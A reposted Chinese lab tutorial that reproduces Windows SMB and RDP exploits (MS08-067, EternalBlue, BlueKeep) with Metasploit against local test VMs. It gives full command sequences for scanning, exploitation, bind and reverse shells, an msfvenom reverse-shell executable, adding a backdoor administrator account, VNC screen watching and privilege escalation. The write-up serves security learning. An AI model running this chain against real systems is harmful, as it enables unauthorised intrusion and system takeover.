欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

MSF本地漏洞复现

程序员文章站 2022-05-26 09:14:56
...

MS08-067复现

MS08-067攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。它影响的Windows系统包括:Windows 2000、Windows XP、Windows Server 2003

  • 靶机:Windows XP;IP:192.168.1.20
    MSF本地漏洞复现

  • 攻击机:Kali系统;IP:192.168.1.7
    MSF本地漏洞复现

利用条件:

  • 靶机445端口开启
    MSF本地漏洞复现
  • 靶机防火墙关闭(netsh firewall set opmode mode=disable)

Nmap扫描探测该漏洞是否存在:

nmap -n -p 445 --script smb-vuln-ms08-067 192.168.1.20 --open

MSF本地漏洞复现

Msfconsole找到漏洞利用模块:

search ms08-067
use exploit/windows/smb/ms08_067_netapi

MSF本地漏洞复现

set rhost 192.168.1.20
show targets
set target 45  
#根据targets信息选择靶机信息

MSF本地漏洞复现

set payload generic/shell_bind_tcp #设置payload
# 设置本地监听地址和端口
set lhost 192.168.1.7
set lport 1122
options   #最终参数设置如下

MSF本地漏洞复现

run  # 建立会话,进行命令执行

MSF本地漏洞复现

ps           #  查看当前靶机进程
migrate 672  #  迁移到pid为672的程序进程上

MSF本地漏洞复现

run vnc  #  监控靶机桌面

KALI&XP傻傻的分不清楚

MSF本地漏洞复现

background      #挂起后台
sessions -l     #查看所有会话
sessions -i 1   #调用会话,1是指会话序号

MS017-010

攻击者利用永恒之蓝MS017-010漏洞在目标系统上可以执行任意代码。

复现环境

攻击机:kali-linux :192.168.1.7

MSF本地漏洞复现

靶机:windows 7 :192.168.1.8
MSF本地漏洞复现

利用条件:

1.smb 445端口开启
2.防火墙关闭
3.kali与靶机建立连接

漏洞利用:

nmap探测漏洞

nmap --script smb-vuln* 192.168.1.8

MSF本地漏洞复现

加载msf进行漏洞利用:

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.1.8
run

利用成功,命令执行:
MSF本地漏洞复现

添加用户且新增到管理员组

net user test 123456 /add
net localgroup administrator test /add

MSF本地漏洞复现

远程连接

exit
rdesktop 192.168.1.8

使用刚刚创建的test用户进行登陆
MSF本地漏洞复现
MSF本地漏洞复现

提权:

此时我们只是win7的管理员用户,需要进行系统权限的提升:

# 利用msf生成1.exe的payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.7 lport=1122 -f exe >1.exe

MSF本地漏洞复现

利用admin管理员用户将1.exe放进靶机win 7里面。

# kali设置监听会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

MSF本地漏洞复现

# kali设置本例监听地址和端口,然后开始监听
set lhost 192.168.1.7
set lport 1122
run

MSF本地漏洞复现

等待win 7 运行1.exe,建立meterpreter连接

尝试会话劫持

getuid
use incognito  # 劫持session
list_tokens -u  # 列出session
# 发现只是管理员权限,没有更高权限会话。无法进行会话劫持
background  # 挂起会话

MSF本地漏洞复现

利用ms15_051提权:

use exploit/windows/local/ms15_051_client_copy_image  
set session 1   #直接设置我刚刚挂载的会话
run

提权成功:
MSF本地漏洞复现

CVE-2019-0708复现

ps:复现这个漏洞有点跑题了,使用msf一直失败没有会话产生,所以下面是直接利用EXP复现的。

正文:

该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。影响Windows系统版本包括:

  • windows2003
  • windows2008
  • windows2008 R2
  • windows xp
  • win 7

复现环境:

kali攻击机:192.168.242.142

windows2008 R2靶机:192.168.1.8
MSF本地漏洞复现

利用条件:

1.靶机防火墙关闭
MSF本地漏洞复现

2.靶机3389端口开启
MSF本地漏洞复现

3.攻击机能通信靶机

复现步骤:

1.下载POC

git clone https://github.com/n1xbyte/CVE-2019-0708.git

MSF本地漏洞复现

2.为脚本文件添加可执行权限

chmod 777 crashpoc.py

MSF本地漏洞复现

3.如果没有以下安装模块,需要另外安装

pip3 install impacket
pip3 install Structure
pip list  #查看自己安装的所有python模块

4.利用脚本攻击

python crashpoc.py 192.168.1.8 64
#192.168.1.8 是目标IP 64是指系统版本

MSF本地漏洞复现

ps:不知道为啥脚本会报错,但是攻击成功能够 ok。不太求甚解…

5.攻击成功,合影留念:
MSF本地漏洞复现

=========================================================

MSF本地漏洞复现